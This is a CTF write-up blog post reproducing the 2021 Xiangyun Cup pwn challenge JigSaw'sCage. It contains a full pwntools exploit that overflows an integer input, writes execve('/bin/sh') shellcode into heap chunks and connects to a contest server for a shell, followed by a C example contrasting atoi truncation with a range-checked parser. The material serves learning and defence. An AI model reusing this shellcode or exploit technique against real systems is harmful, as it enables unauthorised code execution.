ReStr0
Venom team member, ChaMd5 security team
ReStr0-Blog

祥云杯 2021 - JigSaw'sCage reproduction (reproduction pending)

Solution idea

Overflow an integer variable so that the heap becomes executable, then execute shellcode placed on the heap to get a shell.

exp

Exploit by luckyu (师傅)

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
context.arch = "amd64"
# local run (the original also tried: process('./JigSAW', env={"LD_PRELOAD": "./libc.so.6"}))
p = process('./JigSAW')
libc = ELF("./libc.so")
# remote target used during the contest; this overrides the local process above
p = remote("47.104.71.220", 10273)

# menu wrappers
def add(idx):
    p.sendlineafter("Choice :", "1")
    p.sendlineafter("Index? :", str(idx))
def show(idx):
    p.sendlineafter("Choice :", "5")
    p.sendlineafter("Index? :", str(idx))
def edit(idx, content):
    p.sendlineafter("Choice :", "2")
    p.sendlineafter("Index? :", str(idx))
    p.sendafter("iNput:", content)
def free(idx):
    p.sendlineafter("Choice :", "3")
    p.sendlineafter("Index? :", str(idx))
def test(idx):
    p.sendlineafter("Choice :", "4")
    p.sendlineafter("Index? :", str(idx))

def exp():
    # execve("/bin/sh", NULL, NULL) shellcode, split into four pieces (one per heap chunk)
    shellcode1 = asm("mov rsp, rdx\nadd rsp, 0x20\npush rsp")
    shellcode2 = asm("mov rax, 0x68732f6e69622f\nadd rsp, 0x20\npush rsp")  # rax = "/bin/sh\0"
    shellcode3 = asm("push rax\nmov rdi, rsp\nxor rsi, rsi\nadd rsp, 0x28\npush rsp")  # rdi -> "/bin/sh", rsi = NULL
    shellcode4 = asm("xor rdx, rdx\nmov rax, 59\nsyscall\n")  # rdx = NULL, rax = SYS_execve
    print(len(shellcode1))
    p.sendlineafter("Name:", "111")
    # 0x100000000 overflows the integer variable mentioned in the solution idea
    p.sendlineafter("Choice:", str(0x100000000))
    add(0)
    add(1)
    add(2)
    add(3)
    edit(0, shellcode1)
    edit(1, shellcode2)
    edit(2, shellcode3)
    edit(3, shellcode4)
    test(0)
    p.interactive()

if __name__ == '__main__':
    exp()
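The solution idea says the heap becomes executable because an integer variable is overflowed, and the exp above sends 0x100000000 (4294967296) at the "Choice:" prompt. The challenge's own parsing code is not shown on this page, so the C example below is an added illustration, not the binary's code: it assumes the value is read into a 32-bit int with atoi() and shows why that silently turns 0x100000000 into 0 on an LP64 system, next to a range-checked strtol() parser that rejects the same input. The sample inputs are constructed; the function names are hypothetical.

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>

/* Constructed sample inputs (not from the challenge binary).
 * SAMPLE_OVERFLOW is 0x100000000, the value the exp sends at "Choice:". */
static const char *const SAMPLE_OVERFLOW = "4294967296";
static const char *const SAMPLE_NORMAL   = "3";

/* Hypothetical unsafe parser: atoi() is (int)strtol(s, NULL, 10). On an LP64
 * system strtol returns the 64-bit value 0x100000000, and the cast to a 32-bit
 * int keeps only the low 32 bits, so the result is 0. A later bounds check
 * such as "if (choice > MAX)" then passes although the input was far outside
 * the expected range. */
int parse_choice_unsafe(const char *s)
{
    return atoi(s);
}

/* Hardened parser: strtol with errno and explicit range checks.
 * Returns 0 and stores the value on success, -1 on malformed or
 * out-of-range input (including anything that does not fit an int). */
int parse_choice_checked(const char *s, int *out)
{
    char *end = NULL;
    errno = 0;
    long v = strtol(s, &end, 10);

    if (end == s)                                  /* no digits at all */
        return -1;
    if (*end != '\0' && *end != '\n')              /* trailing garbage */
        return -1;
    if (errno == ERANGE || v < 0 || v > INT_MAX)   /* does not fit the field */
        return -1;

    *out = (int)v;
    return 0;
}

/* Convenience wrapper: the parsed value, or -1 if the input was rejected. */
int checked_choice(const char *s)
{
    int v;
    return parse_choice_checked(s, &v) == 0 ? v : -1;
}

int main(void)
{
    printf("atoi(\"%s\")            = %d\n", SAMPLE_OVERFLOW, parse_choice_unsafe(SAMPLE_OVERFLOW));
    printf("checked_choice(\"%s\")  = %d\n", SAMPLE_OVERFLOW, checked_choice(SAMPLE_OVERFLOW));
    printf("checked_choice(\"%s\")           = %d\n", SAMPLE_NORMAL, checked_choice(SAMPLE_NORMAL));
    return 0;
}
```

The first line of output is the whole point: the unsafe parser reports 0 for an input of 4294967296, so any validation done on the truncated value is meaningless; the checked parser refuses the input before it ever reaches a size or mode field.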
2021-08-22